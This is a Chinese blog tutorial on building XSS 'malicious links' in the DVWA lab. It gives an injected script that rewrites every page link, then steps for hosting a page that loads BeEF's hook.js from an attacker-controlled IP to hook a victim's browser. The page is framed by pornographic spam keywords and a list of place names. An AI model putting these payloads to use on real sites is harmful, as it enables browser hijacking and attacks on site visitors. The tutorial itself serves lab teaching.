91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

XSS漏洞的惡意鏈接是怎樣的

發布時間:2021-12-09 19:11:45 來源:億速云 閱讀:277 作者:柒染 欄目:大數據

這篇文章給大家介紹XSS漏洞的惡意鏈接是怎樣的,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

一、環境:DVWA

二、修改網頁鏈接

1、點擊下面的網址,訪問的是不同的內容

XSS漏洞的惡意鏈接是怎樣的XSS漏洞的惡意鏈接是怎樣的

2、通過xss漏洞,修改這些網址都指向百度

window.onload:當窗口加載時,執行匿名函數

<script>

window.onload=function(){

var link=document.getElementsByTagName("a");

for(j=0;j<link.length;j++){

link[j].href="https://www.baidu.com";

}

}

</script>

3、在漏洞處輸入上面代碼,提交

XSS漏洞的惡意鏈接是怎樣的

 三、生成惡意鏈接(kali攻擊,win7被攻擊)

1、kali啟動beff-xss

2、啟動apache服務:service apache2 start

3、cd /var/www/html

修改index.html

<script src="

http://控制端ip:3000/hook.js"></script>

XSS漏洞的惡意鏈接是怎樣的

5、被控端上線。

關于XSS漏洞的惡意鏈接是怎樣的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

xss
AI

庆云县| 潜山县| 成都市| 怀来县| 镇安县| 正蓝旗| 辽宁省| 达日县| 阳东县| 如东县| 水富县| 夏津县| 宁强县| 泰安市| 东乌珠穆沁旗| 霍城县| 名山县| 青田县| 馆陶县| 仪陇县| 新营市| 淮安市| 郯城县| 清涧县| 若尔盖县| 会宁县| 盖州市| 朝阳县| 南康市| 徐州市| 深水埗区| 翼城县| 万源市| 兴化市| 观塘区| 淅川县| 汪清县| 庆阳市| 都昌县| 隆德县| 满洲里市|